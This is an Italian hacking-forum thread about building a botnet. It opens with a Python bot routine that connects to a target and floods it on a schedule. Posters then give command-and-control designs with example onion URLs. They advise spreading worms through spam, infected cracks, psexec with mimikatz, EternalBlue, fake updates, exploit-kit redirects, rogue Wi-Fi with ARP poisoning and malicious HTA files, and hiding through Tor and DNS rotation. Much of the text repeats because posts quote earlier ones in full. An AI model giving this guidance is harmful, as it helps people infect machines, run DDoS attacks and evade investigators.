Domanda Dove acquistare VPS per creare una botnet?

[Anianded]

Proseguiamo per passi: innanzitutto, grazie per i complimenti, ma a me piace questa "materia", quindi quando scrivo non mi fermo piu' lol.

Poi:


Ti riporto il codice e ti spiego meglio:

   """
   Perform the attack on the specified target's port at the given time.
   """
   def attack(self, target, atkTime):
      atkTimeStr = Util.formatTimeMS(atkTime)

      print 'Going to attack Target @ %s:%d on ' \
         % (target[0], target[1]) + atkTimeStr + '\n'

      # account for the time difference between bot and master
      waitTimeMilSecs = long(atkTime) -  (Util.getCurrTime() + offset)

      if waitTimeMilSecs < 0:
         print 'Missed the attack :-('
         return

      print 'Sleeping for [msec]: ', waitTimeMilSecs

      # wait
      waitTimeSecs = float(waitTimeMilSecs)/1000
      time.sleep(waitTimeSecs)

      # wait complete, connect to target
      print 'Connecting to Target @ %s:%d...' % (target[0], target[1])
      targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      targetSocket.connect((target[0], target[1]))
      print 'Connected'

      # perform attack for 30 seconds
      startTime = time.time()
      timeout = 30
      print 'Attacking for', timeout, 'seconds...'
      while time.time() < startTime + timeout:
         time.sleep(rate) # send message every second
         Util.send(targetSocket, 'You\'re being attacked!!!')
      print 'Attack finished'

      targetSocket.close()

Questa e' la parte di una botnet in python "educativa" : io non cosniglio di uppare perche' maggiori precauzioni prese dopo un eventuale scoperta di essere stati infettati, potrebbe soltanto lasciare piu' tracce di cosa vogliamo fare, di cosa puntiamo e magari di noi stessi; Una buona prassi e' quella di integrare il "dosser" prprio all' interno del vettore di infezione in modo da evitare ulteriori problemi: se il tuo obbiettivo e' solo dossare e non fare null' altro, e' inutile lasciare tracce ed infettare con qualcosa che poi non sara' funzionale.
Il discorso cambia se invece la botnet la devi adottare piu' per "spionaggio" e solo eventualmente per ddos: in questo caso sarebbe bene creare un vettore di infezione che monitora le attivita' base della macchina infetta: esempio spento, accesso, connesso ad internet, che ora ha, timezone,cmd generale,upload e poc altro, poi adottare questo controllo "basico" della macchina per eseguire invece comandi piu' complessi attraverso delle estensioni, come quelle per gli screenshot, quelle per il ddos, quelle per il download di file da macchina ecc......



Qunto detto prima penso sia' la intro: come detto e' meglio stabilire un contatto diretto con un vettore gia' "armato" se si ha intenzione di eseguire azioni automatizzate e non vuoi accesso alla macchina in se' [nel senso non vuoi fare screen,audio record ecc.....], quindi puntare subito al sodo; Mentre nel caso in cui vuoi fare piu' "attivita' di spionaggio" e non hai un' idea precisa in mente, lla cosa migliore e' creare un vettore con comandi base che eviti di farsi scoprire e che adotti per operazioni piu' complesse delle "estensioni".



Questo lo imposti tu: le 2 alternative piu' valide sono

1. Attraverso richieste GET/POST e script php nel server di ricezione delle informazioni: in parole povere, sarebbe come dire di fare una cosa del genere:

      non mi fa' postare nulla.....         command = requests.get(settings.SERVER_URL + "/api/pop?botid=" +id+infosistema+piattaforma+altri+dati

   , in questo modo dicimo proprio come succede con le credenziali di un sito, solo che non viene interrogato un db, ma la macchina stessa allega le informazioni che invia poi al master.
2. Attraverso socket di ricezione delle info: in questo caso la cosa e' praticamente la stessa, solo che non funge tramite richieste get e post ma tramiteflussi di dati fra master bot e bot zombie.

Allora, quello che hai detto e' impossibile lol, nel senso che mai tutti i bot di una botnet saranno attivi [almeno che non si usano dispositivi ioT]; Per quanto detto cio', si : le botnet si suddividono principalemnte in 3 modi: IRC, HTTP,HTTPS;
Le preferite [nel senso le piu' adottate] sono quelle HTTP: facili da usare, efficaci e piu' potenti di quelle IRC, piu' semplici da adottare delle HTTPS. Per quanto riguarda cio', poi ci sono vari attacchi ddos : udp, tcp ecc......., essi agiscono solo su alcuni protocolli, ma ti dico che HTTP e' il migliore [o almeno penso].

Per quanto detto, si: HTTP, poi che significa "limitato al word wild web" ??? I comandi come detto vengono impartiti tramite accesso generale al cmd dei bot o tramite altri escamotage: questi li devi trovare tu progettatore, come mail contenenti comandi ecc......
La porta ecc...., lo decidi sempre tu con il vettore: ti cosngilio di dare un' occhiata a qualche source, ti schiarisce molto le idee, e sono abbastanza semplici dato che l' 80% dei comandi sono: sysinfo, ls, dir, GET_['info'] ecc....

Io sinceramente non vedo da difficolta', in quanto php dovresti sfruttare post/get, quindi per forza web developer, mentre come dici tu, si' si potrebbe fare con i socket: fai un socket di ascolto/master bot, con menu' ricorsivo per scegliere quali estensioni/comandi dare ed hai fatto.
Per altre info sono sempre qui

scusa il ritardo ma ho visto solo ora la risposta, grazie mille!! in caso se ho dubbi scrivo qua

 

[Anianded]

@Gorate quindi, le botnet non HTTP o IRC, che funzionano tramite riga di comando, per esempio scritte in python, si chiamano in un modo particolare? O non hanno un nome come le HTTP e IRC?

 

[Gorate]

@Gorate quindi, le botnet non HTTP o IRC, che funzionano tramite riga di comando, per esempio scritte in python, si chiamano in un modo particolare? O non hanno un nome come le HTTP e IRC?

Non e' che sono proprio "da riga di comando" : non e' l' interfaccia la cosa differente, ma il metodo di trasmissione: che adotta un socket per ricevere ed inviare [che quindi puoi gestire da terminale] e non le richieste get/post che invece gestisci tramite script in php e pagine web;
La cosa differente e' proprio questa, poi il resto non cambia nel funzionameto:
c'e' un bot master che impartisce comandi e vari zombie che li eseguono; L' unica cosa che cambia e' proprio il metodo di trasmissione delle info che invece di essere cosi' :

esempio:

botmasterserver.onion/receive.php?out=......_command=ls_command2=get.timezone().....ecc....
o
botmasterserver.onion/command.php?command=ls
[con richieste get e post],

diventa:

con i socket: socket che riceve e manda comandi ------vps/tor/proxy/altro -------- socket aperto dalla vittima che invia la richiesta di connessione

[lo dovresti poter leggere dall inizio alla fine e dalla fine all inizio: segue entrambe le direzioni, solo con scopi diversi: dall inizio alla fine nel caso di invio di comandi; Dalla fine all' inizio in caso di ricezione di output e/o richieste di comandi ecc........]

Ma resta tutto sattamente come se fosse una botnet "normale" : puo' essere anche IRC od HTTP, ma cambia il metodo di ricezione/trasmissione [come barbaramente illustrato sopra]

 

[Sinnex]

Usa qBOT | Mirai se vuoi usare IoT
Usa amplification se non sai fare un pazzo
Usa HTTP se hai un crypter e traffico.
Non fare niente se sei uno script kiddie.

 

[Anianded]

Non e' che sono proprio "da riga di comando" : non e' l' interfaccia la cosa differente, ma il metodo di trasmissione: che adotta un socket per ricevere ed inviare [che quindi puoi gestire da terminale] e non le richieste get/post che invece gestisci tramite script in php e pagine web;
La cosa differente e' proprio questa, poi il resto non cambia nel funzionameto:
c'e' un bot master che impartisce comandi e vari zombie che li eseguono; L' unica cosa che cambia e' proprio il metodo di trasmissione delle info che invece di essere cosi' :

esempio:

botmasterserver.onion/receive.php?out=......_command=ls_command2=get.timezone().....ecc....
o
botmasterserver.onion/command.php?command=ls
[con richieste get e post],

diventa:

con i socket: socket che riceve e manda comandi ------vps/tor/proxy/altro -------- socket aperto dalla vittima che invia la richiesta di connessione

[lo dovresti poter leggere dall inizio alla fine e dalla fine all inizio: segue entrambe le direzioni, solo con scopi diversi: dall inizio alla fine nel caso di invio di comandi; Dalla fine all' inizio in caso di ricezione di output e/o richieste di comandi ecc........]

Ma resta tutto sattamente come se fosse una botnet "normale" : puo' essere anche IRC od HTTP, ma cambia il metodo di ricezione/trasmissione [come barbaramente illustrato sopra]

Grazie come sempre, ma quindi, queste botnet spartane non HTTP e IRC che interagiscono come hai descritto tu, hanno un nome particolare?

 

[Anianded]

Usa qBOT | Mirai se vuoi usare IoT
Usa amplification se non sai fare un pazzo
Usa HTTP se hai un crypter e traffico.
Non fare niente se sei uno script kiddie.

per l'amplification c'è bisogno di spoofare l'ip, e ormai tutti gli isp bloccano tutti i tentativi di spoofing. L'unica cosa sarebbe acquistare dei bulletproof hosting off shore... Non credo che eseguire un amplification sia così facile

 

[Anianded]

Grazie come sempre, ma quindi, queste botnet spartane non HTTP e IRC che interagiscono come hai descritto tu, hanno un nome particolare?

Deduco che non abbiano un nome quindi lol

 

[Gorate]

Deduco che non abbiano un nome quindi lol

Lol scusami: ho detto tante cose ma non ti ho risposto, ora rimedio:

allora di per se' non avrebbero un nome particolare........ma potresti provare a cercare cose come "botnet socket", poi sei tu che decidi se il socket lo controlli da riga di comando, da terminale o da gui grafica/pannello di controllo......, proprio come detto prima;
Un nome per la ricerca su google quindi potrebbe essere :

• Botnet socket
• botnet socket gui
• botnet from command line
  
• botnet from terminal
  
• botnet socket from terminal

[Queste sono keyword per cercare materiale inerente su google e simili............]

 

[ScriptMan]

Deduco che non abbiano un nome quindi lol

Aspetta quello che tu intendi non è il nome della botnet ma del protocollo con cui esse operano ci sono botnet che operano con protocollo http e si chiamano così come botnet che operano attraverso irc; diciamo che in questo caso il protocollo fa il monaco

 

[Gorate]

Comunque, il modo migliore per ottenere tanti bot e' attraverso un vettore di infezione worm: piu' si diffonde e meglio e', quindi la progettazione di un buon worm e' quasi piu' importante del software che userai per amministrarla.
Consiglio un worm fatto in linguaggi a basso livello, poi magari anche python, ma c e c++ sono imbattibili in cio' ; Magari sfruttando la solita condivisione mail e la propagazione in rete del file tramite condivisione.
Poi se magari trovi qualche vulnerabilita' e' ancora meglio, perche' li' puoi sbizzarrirti..............

 

[ScriptMan]

Comunque, il modo migliore per ottenere tanti bot e' attraverso un vettore di infezione worm: piu' si diffonde e meglio e', quindi la progettazione di un buon worm e' quasi piu' importante del software che userai per amministrarla.
Consiglio un worm fatto in linguaggi a basso livello, poi magari anche python, ma c e c++ sono imbattibili in cio' ; Magari sfruttando la solita condivisione mail e la propagazione in rete del file tramite condivisione.
Poi se magari trovi qualche vulnerabilita' e' ancora meglio, perche' li' puoi sbizzarrirti..............

Riprendendo il discorso di Gorate io per lo spreading oltre alle classiche mail infette consiglio come in Letta in lan il tool microsoft psexec con mimikatz per recuperare le password necessarie del pc in cui lanci l`attacco e in wan eternalblue stile Wanncry stamattina sono dovuto partire presto dopo ti lascio tutta la documentazione

 

[ScriptMan]

https://nakedsecurity.sophos.com/20...g-petya-how-it-spreads-and-how-to-fight-back/ questo è per psexec e questo è per eternalblue direttamente dal blog malwarebytes https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ sono documentazioni teoriche naturalmente la pratica devi metterla te

 

[Gorate]

https://nakedsecurity.sophos.com/20...g-petya-how-it-spreads-and-how-to-fight-back/ questo è per psexec e questo è per eternalblue direttamente dal blog malwarebytes https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ sono documentazioni teoriche naturalmente la pratica devi metterla te

Buono, mi hai tolto i link di mano lol ; Comunque la cosa che vi fa' capire che questa vulnerabilita' e' ancora ampiamente sfruttabile e' il fatto che dopo il terribile attacco di wannacry, pochissimi pc erano stati patchati, tanto che NotPetya, che colpi' una decina di giorni dopo, riusci ad insediarsi in ben 140 nazioni, ed in moltissimi pc, quasi come il suo predecessore...........quindi se non basta un ransomware per farti patchare il pc...........non so' cosa .
Ti consiglio anche di controllare un vettore di diffusione a "grandi vedute" : un servizio che ora e' down, si chiamava Avalanche [significa valanga], sfruttava una piattaforma per diffondere virus altrui tramite varie vulnerabilita' che ora elenco:

• Pubblicita' infette negli AD di siti per adulti e poco controllati
• Siti gia' exploitati come vettori di diffusione per mandare email infette
• Vulnerabilita' nei pdf viewer [injectavano codice infetto appena si apriva il file da browser], nei plugin chrome e firefox, nei plugin wordpress per riuscire ad insediarsi nel sito per poter poi mandare altre mail
• Sfruttava veri e propri siti con ip grab per trovare l' IP di coloro che vi andavano sopra, per poi tracciare una "mappa" delle sue "preferenze" [questo solo in caso di bersagli scelti]
• Diffusione in rete ed un tool molto simile a quello pubblicato da wikileaks dopo l' attacco alla CIA: praticamente il malintenzionato "fondeva" il proprio virus con un tool che appena aperto il file maelvolo, andava a creare una rete parallela in ascolto, che poi andava a vedere il traffico degli altri pc, e da qui, injectava codice malevolo come ad esempio la modifica di html in entrata nella macchina con applet infetto.....ed alti escamotage

Proprio quest' ultimo e' stato una rivoluzione proprio perche' se si capita in un grande range con moltissimi pc [vedi universita', studi di professionali o aziende], da un solo pc si puo' arrivare ad infettare piu' di 20/50/100 pc , con un solo attacco.
Altre tecniche potrebbero essere il redirecting verso siti satellite infetti con applet o js malevoli.
Per altre info siamo sempre qui

 

[ScriptMan]

Buono, mi hai tolto i link di mano lol ; Comunque la cosa che vi fa' capire che questa vulnerabilita' e' ancora ampiamente sfruttabile e' il fatto che dopo il terribile attacco di wannacry, pochissimi pc erano stati patchati, tanto che NotPetya, che colpi' una decina di giorni dopo, riusci ad insediarsi in ben 140 nazioni, ed in moltissimi pc, quasi come il suo predecessore...........quindi se non basta un ransomware per farti patchare il pc...........non so' cosa .
Ti consiglio anche di controllare un vettore di diffusione a "grandi vedute" : un servizio che ora e' down, si chiamava Avalanche [significa valanga], sfruttava una piattaforma per diffondere virus altrui tramite varie vulnerabilita' che ora elenco:

• Pubblicita' infette negli AD di siti per adulti e poco controllati
• Siti gia' exploitati come vettori di diffusione per mandare email infette
• Vulnerabilita' nei pdf viewer [injectavano codice infetto appena si apriva il file da browser], nei plugin chrome e firefox, nei plugin wordpress per riuscire ad insediarsi nel sito per poter poi mandare altre mail
• Sfruttava veri e propri siti con ip grab per trovare l' IP di coloro che vi andavano sopra, per poi tracciare una "mappa" delle sue "preferenze" [questo solo in caso di bersagli scelti]
• Diffusione in rete ed un tool molto simile a quello pubblicato da wikileaks dopo l' attacco alla CIA: praticamente il malintenzionato "fondeva" il proprio virus con un tool che appena aperto il file maelvolo, andava a creare una rete parallela in ascolto, che poi andava a vedere il traffico degli altri pc, e da qui, injectava codice malevolo come ad esempio la modifica di html in entrata nella macchina con applet infetto.....ed alti escamotage

Proprio quest' ultimo e' stato una rivoluzione proprio perche' se si capita in un grande range con moltissimi pc [vedi universita', studi di professionali o aziende], da un solo pc si puo' arrivare ad infettare piu' di 20/50/100 pc , con un solo attacco.
Altre tecniche potrebbero essere il redirecting verso siti satellite infetti con applet o js malevoli.
Per altre info siamo sempre qui

Esatto sono d`accordo con te queste vulnerabilità sono tutt`altro che patchate comunque io non escluderei anche il vettore di spreading con il quale si è espanso petya: un aggiornamento malevolo di un programma lecito; specialmente i programmi out of date con siti ormai vecchiotti facilmente hackerabili possono permettere all`attaccante di creare un finto update di quello per poi erogarlo tramite gli aggiornamenti automatici del programma stesso bucando il sito o ottenendo l`accesso al server da dove essi sono scaricati

 

[Gorate]

Esatto sono d`accordo con te queste vulnerabilità sono tutt`altro che patchate comunque io non escluderei anche il vettore di spreading con il quale si è espanso petya: un aggiornamento malevolo di un programma lecito; specialmente i programmi out of date con siti ormai vecchiotti facilmente hackerabili possono permettere all`attaccante di creare un finto update di quello per poi erogarlo tramite gli aggiornamenti automatici del programma stesso bucando il sito o ottenendo l`accesso al server da dove essi sono scaricati

Esatto, e' una cosa importante da non sottovalutare dato che di amministratori di siti che conoscono gli hash, ce ne sono ben pochi; Il 90% di chi li conosce non dice: "L' hash del file e' xxxxxxxxxxxxx e appena scarichi il file controllalo subito con il comando

md5sum file.ext

sha256sum file.ext

: se l' hash del tuo file non corrisponde, eliminalo, e' stato corrotto."


Una cosa utile sarebbe proprio adottre sti satellite per fare diverse azioni: ad uno carichi un semplice script in php che spamma mail infette, ad un altro lo usi come pannello secondario, un altro ancora come kill-switch [dato che stiamo parlando di petya e wannacry lol], un altro ancora per contenere file infetti secondari, alri per ddos alla ufonet............e cosi' via;
La cosa e' molto utile per evitare collegamenti diretti fra te e la vittima ...... e per mantenere un discreto livello di anonimato

 

[ScriptMan]

Esatto, e' una cosa importante da non sottovalutare dato che di amministratori di siti che conoscono gli hash, ce ne sono ben pochi; Il 90% di chi li conosce non dice: "L' hash del file e' xxxxxxxxxxxxx e appena scarichi il file controllalo subito con il comando

md5sum file.ext

sha256sum file.ext

: se l' hash del tuo file non corrisponde, eliminalo, e' stato corrotto."


Una cosa utile sarebbe proprio adottre sti satellite per fare diverse azioni: ad uno carichi un semplice script in php che spamma mail infette, ad un altro lo usi come pannello secondario, un altro ancora come kill-switch [dato che stiamo parlando di petya e wannacry lol], un altro ancora per contenere file infetti secondari, alri per ddos alla ufonet............e cosi' via;
La cosa e' molto utile per evitare collegamenti diretti fra te e la vittima ...... e per mantenere un discreto livello di anonimato

Giusto ma il kill switch è stato sempre un problema per questi virus cerca di svilupparne uno diverso da quello dei virus che ha detto Gorate

 

[Anianded]

Grazie ancora per le numerose informazioni che mi state dando!

Ti consiglio anche di controllare un vettore di diffusione a "grandi vedute" : un servizio che ora e' down, si chiamava Avalanche [significa valanga], sfruttava una piattaforma per diffondere virus altrui tramite varie vulnerabilita' che ora elenco:
.......

RIguardo questa tua affermazione, ho delle domande. Questo servizio sfruttava una piattaforma per diffondere virus altrui tramite varie vuln... Questa piattaforma, si occupa proprio di fare spreading di virus? O ho capito male?

Inoltre, volevo chiedere, mettiamo caso che si riesca a realizzare una botnet, che sia socket botnet, HTTP O IRC. E si volesse hostarla su un server. Come si fa per evitare che i client si connettano direttamente all'indirizzo pubblico del server? C'è un modo di farli connettere all'ipotetico server di controllo dei bot senza però utilizzare l'ip del server? Sotto tor è possibile in qualche modo? Se si, come? O ci sono altri metodi più efficaci e semplici? Illuminatemi ahahha

 

[Anianded]

Si esatto: comunque si occupava.........e' stata resa down a maggio di quest' anno.

Esistono ancora servizi del genere?

innanitutto appena apri un collegamento con un client, cerca un modo per criptare la connessione. Leggendo di alcune botnet, ho letto che i proprietari cambiavano DNS almeno una volta al giorno ................

Di che DNS si sta parlando?

un metodo piu' semplice sarebbe quello di adottare un pannello decentralizzato: piu' pannelli secondari che fanno capo ad un pannello principale: ogni pannello principale con solo qualche bot, in modo da evitare che se viene messa down ti arrestano del tutto la botnet.
Inoltre, per evitare che risalgano direttamente a te, oltre a criptare, io userei un plugin nel vettore di attacco intercambiabile ed aggiornabile su tutti i pc in tempo reale attraverso una serie di comandi automatizzati nella shell generale; In questo modo potresti avere la possibilita' di cambiare piu' volte il tuo dominio, magari sfruttado qualche marchingegnio, ma questo lo devi trovare tu............io ti consiglio di riflettere sul kill switch con uso opposto.....................altro dirti non vo' .
Una cosa molto importante e' inoltre l' anonimato: servizio su siti onion, con triplo login [se vuoi] in modo da evitare che tutti usufruiscano della tua botnet...e magari anche un metodo di evasione, magari attraverso un finto log che riporta ad un sito down.

Si, avevo pensato anch'io a questo, ma io chiedevo i metodi più semplici e immediati quindi cosa mi consigli?

Per il resto, potresti anche sfruttare servizi come no-ip in modo automatizzato per creare vari hostname per il tuo ip, ma non servirebbe a nulla dato che ricondurrebbe inevitabilmente a quest' ultimo.

Esatto quindi sarebbe inutile

 

[Anianded]

Da quel che mi risulta , ufficialmente NO, ma chissa' quanti ce ne sono nascosti [magari sono falsi], ma chissa' quanti ............comuque uno potrebero pure occuparsi dello spread solo in seguito e di proprio: usi il tutto con le tecniche tradizionali e poi adotti una vulnerabilita'/tecnica particolare per incrementare i bot, comunque posso dirti con sicurezza che prima di usare falle ecc........, dovresti avere gia' una bella base da cui solo dopo cominciare a mandare in giro il worm....

per usare tecniche tradizionali intendi: spam email e crack infette su torrent e youtube?

Dei DNS del server: Il sistema dei nomi di dominio (in inglese: Domain Name System, DNS), è un sistema utilizzato per la risoluzione di nomi dei nodi della rete (in inglese: host) in indirizzi IP e viceversa. Il servizio è realizzato tramite un database distribuito, costituito dai server DNS.
In questo modo apena uno cambia il DNS, sembra che il sito non sia mai esistito, e il tutto cambia qualsiasi file di controllo di locazione, quindi diciamo che questa e' la scelta fatta da grnadi botnet del passato: da Necrus, a Zeus ad AlfaBot e cosi' via..................

Si sapevo cosa sono i DNS lol, comunque perchè se uno cambia dns il sito non è mai esistito? Il dns che si cambia è quello del server quindi per esempio in un server linux i nameservers su /etc/resolv.conf?

Ora che ci penso: tu dicevi socket botnet, quindi valgono tutte le cose tranne un login ................dovresti proteggere il file con una password piuttosto articolata per evitare che l' accesso al server porti al conseguente riutilizzo del tool..............Per evitare qualsiasi inghippo, consiglio proprio di usare un sistema torrificato, di accedere tramite tor e di cancellare qualsiasi traccia: dal login alla cache; Inoltre consiglierei di inserire molti controlli all' inizio per evitare intrusioni: magari disattiva servizi come ssh o simili che mettono a repentaglio l' incolumita' del server e del tuo tool.

E' possibile quindi in qualche modo per i bot connessi anzichè connettersi all'ip del server, connettersi all'ip di tor che è runnato nel server? Non so se si possa fare... non credo

 

[ScriptMan]

per usare tecniche tradizionali intendi: spam email e crack infette su torrent e youtube?

Si sapevo cosa sono i DNS lol, comunque perchè se uno cambia dns il sito non è mai esistito? Il dns che si cambia è quello del server quindi per esempio in un server linux i nameservers su /etc/resolv.conf?



E' possibile quindi in qualche modo per i bot connessi anzichè connettersi all'ip del server, connettersi all'ip di tor che è runnato nel server? Non so se si possa fare... non credo

Intende esattamente quello come metodo di di streaming ma io aggiungerei anche fake updates, riguardo la seconda cosa del DNS il sito è esistito ma è come se ora come ora non è raggiungibile per la terza cosa puoi connetterti al server tramite la rete tor così che se hosti il server sulla "rete" deep web diminuiscono le possibilità che scoprano che tu sei il creatore del server/sito

 

[Anianded]

Intende esattamente quello come metodo di di streaming ma io aggiungerei anche fake updates, riguardo la seconda cosa del DNS il sito è esistito ma è come se ora come ora non è raggiungibile per la terza cosa puoi connetterti al server tramite la rete tor così che se hosti il server sulla "rete" deep web diminuiscono le possibilità che scoprano che tu sei il creatore del server/sito

Perfetto ora ho capito, ti continuo a ringraziare per l'enorme curiosità che mi stai togliendo. Ritornando a tor, ora mi è più chiaro, devono essere i bot che devono connettersi tramite tor al server. Il problema è: come fare? Molto spesso tor non è installato nei sistemi, e in quel caso che si fa?

 

[Anianded]

Non so come ringraziarti apparte mettendoti mi piace perchè mi stai veramente dando molte informazioni, grazie! Ho capito tutto di quello che hai detto perchè sei sempre molto chiaro. Anche se vorrei altre delucidazioni per qualche mio dubbio.

Si: da download infetti, ad email di spam, a siti "contaggiati" che poi servono per propagare ancora il worm o semplicemente che hostano applet infetti ..........js malevoli od altre web app malevoli che appena uno ci va' sopra, viene infettato.

vedi esempio: vittima ------------sito infettato -----------[redirect] -----------malicious site with exploit kit or malicious web app

Altre tecniche poi potrebbero essere l' utilizzo di ads non autorizzati conteneti malware in js, la propagazione tramite falle scoperte: come detto ancora il 70% del mondo [anche dopo gli attacchi di NotPetya e Wannacry], non ha ancora aggiornato la versione di windows con la relativa patch ...........

Quando si parla di integrare in un sito malevolo codice js o exploit kit, come si fa? O meglio cosa si può arrivare a fare con il solo ausilio dei js? SI può arrivare ad eseguire il file direttamente nel pc della vittima? E poi, gli exploit kit (parlo del lato web-client) sono fatti prevalentemente di codice js?

Un ultimo metod sarebbe quello per "comune" : vai nel bar del comune con la bellissima e [non] protettisiima wifi libera; Injecti nel traffico dei pc collegati il worm che poi lo trasmetteranno nella loro casa e cosi' via .

Tu parli di "injectare" il worm in una wifi libera... Ma in che senso "injectare"? In che modo?

 

[Anianded]

senno', se vuoi un unico pannello sotto TOR, o adotti il worm con implementazione proxy : quindi si connette in automatico ad un proxy TOR per connettersi poi al server.
La cosa bella e' che se vuoi farlo con socket, la cosa diviene piu' semplice rispetto a quella con get/post in quanto le richieste potrebbero essere in qualche modo compromettenti.

Parlavo di socket botnet lol, comunque, grazie di nuovo per la risposta, e mi soffermerei su questa parte... Quando dici che si deve connettere in automatico in un proxy TOR, a quale proxy ti riferisci?

 

[Anianded]

Allora, in sostanza un exploit kit e' un kit che sfrutta vulnerabilita' [spesso ancora non patchate : 0day perche' si hanno 0 giorni per patcharle altrimenti succede un casino] per injectare codice malevolo all' interno del browser della vittima, all' interno di un plugin affetto da vulnerabilita' od eventualmente nello stesso sistema. Questi exploit kit sono inseriti all' interno di un sito "zombie" che puo' avere 2 funzioni:

1. Inizialmente potrebbe hostare di suo l' exploit kit
2. Ma si preferisce usare questi siti zombie come redirecter [redirect vero e proprio oppure tramite iframe per evitare un contatto diretto fra vittima e sito malevolo] che poi riporta al sito attacker che contiene non 1, ma 3/4/10/50 applicativi infetti e codici che servono a sfruttare in ogni modo possibile ed inimmaginabile le falle nei sistemi.

Se vuoi un consiglio, cerca su google "Beef + armitage botnet" : ora ti spiego meglio cosa e' e come funge, ma intanto ti dico che quello e' un esempio quasi perfetto di botnet [anche se piu' da studio che da uso reale, ma e' ottima per capire la dinameica degli exploit kit e delle botnet , nel senso di come lavorano......]; Beef hook e' un software che serve , attraverso un lin infetto a riportare la vittima in un vero e proprio host di exploit kit, e dal pannello si possono lanciare attacchi, ma anche moduli post-exploiting; Integrando beef con armitage, famosa interfaccia grafica di metasploit, puoi riuscire a sfruttare i 2 tool [come detto sono buoni per capire le dinamiche, ma non per uso reale].

Bhe, calcola che qualche annetto fa' usci' il primo ransomware in js ................puro..........................
Conta che js e' ormai nel 93% dei dispositivi di tutto il mondo, e conta che i framework che lo caratterizzano lo hanno fatto diventare non piu' un linguaggio di script [per il quale invece nacque : java script], ma un vero e proprio linguaggio di programmazione;
Poi naturalemnte js e' usato come vettore per eseguire altre operazioni che magari invece sfruttano applet java, vulnerabilita' nel pdf viewer [scritto in js] od altro per entrare nel sistema.
Ma js come detto non e' il vettore principale, ma il tramite in moltissime occasioni:

esempio:
vulnerabilita' plugin installati
|
|
browser vittima ----------sito con js malevolo -----------------exploit kit ----------------sfrutta vulnerabilita' del browser nell' esecuzione di codice |
|
vulnerabilita' di altra natura


: [significa il tutto viene adottato] inject codice nel sistema target

Grazie mille, chiarissimo come sempre, sei diventato il mio mentore lool. Comunque, una piccola domanda, hai detto che la combinazione beef + armitage è buona per capire la dinamica degli attacchi ma non per uso reale, perché?

 

[Anianded]

Per injectare un worm nella wifi, o adotti un fake point access: praticamente crei una tua wifi dove poi modifichi il contenuto html delle pagine che visitano le vittime, e magari inserisci un iframe sull exploit kit o forzi un azione;
Oppure esegui arp poisoning e di conseguenza redirecti tutti su una pagina che dice: " vai al sito tot per far rifunziare la wifi" oppure "scarica il file ed avvialo per poter finalmnte usare la wifi" : consiglio l' esecuzione di hta file malevoli che sono di molto effetto.

Riguardo il "vai al sito tot per far rifunzionare la wifi", cosa posso arrivare a fare senza far necessariamente scaricare e aprire il file client dei bot? C'è la possibilità, per l'attaccante, di far joinare bot solo attraverso un redirect senza download e apertura del file? Al di là di vuln varie... Io dico in generale se si può fare.. Perchè è ovvio che per uno come te sfuttare o trovare vuln sia una cosa fatta e rifatta, ma per uno alle prime armi che vuole imparare queste dinamiche di attacco e come difendersi da esse, punta su cose più basilare per poi passare mano a mano a cose più complesse